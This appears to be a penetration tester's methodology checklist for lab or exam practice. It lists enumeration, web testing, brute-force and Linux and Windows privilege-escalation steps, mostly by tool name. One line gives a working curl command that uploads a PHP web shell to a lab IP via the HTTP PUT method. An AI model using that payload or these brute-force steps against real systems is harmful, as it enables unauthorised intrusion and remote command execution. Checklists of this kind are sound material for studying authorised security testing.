#################################
#	Global Enumeration	#
#################################
0-cat _full_tcp_nmap.txt | grep "/tcp" | grep open
1-Software version and searchsploit
2.0-Pattern 
2.1-Services enumeration (Is dir writable or not)
2.3-Services brute force 
2.4-UDP Checking (TFTP AND SNMP)
3-Extraction (nmap)
4-Web enumeration

#########################
#	Web Enumeration	#
#########################
0-nikto
1-Hidden directory search (cgi-bin with dirbuster gui and sh,py,pl file extensions)
2.1-Hidden files search
2.2-get / post / put method test
2.2.1 curl -v -X OPTIONS http://192.168.130.137/test (for method search)
2.2.2 curl -v -X PUT -d '<?php system ($_GET["cmd"]); ?>' http://192.168.130.137/test/shell.php (for put upload)
3-cmseek or ​ wappalyzer​ to find cms 
4-github cms name exploit (mostly sql injection)
5-dns enumeration 
6-domain / subdomain enumeration 
7-burpsuite 
8-lfi/rfi,php wrapper

9- for i in {list of modules found }; do searchsploit $i; done | grep -v "No Result"



##Brute -force
-Get username or brute force using passwd reset feature
-Get dic and brute force with username found


#################################################
#	Linux Privilege Escalation		#
#################################################
1-Default username and password login (add root)
2-pspy
3-tcpdump (-i any -w file.pcap)

#########################################
#	Windows Privilege Escalation	#
#########################################
1-impersonate
2-Sherlock
3-powerUp
4-WinPEAS
5-JawEnum
6-windows-exploit-suggester
7-Software Vulnerabilities checking (C:/Programm File ProgramData etc..)
8-process with ps
9-user files checking
10-Windows xp => upnhost 
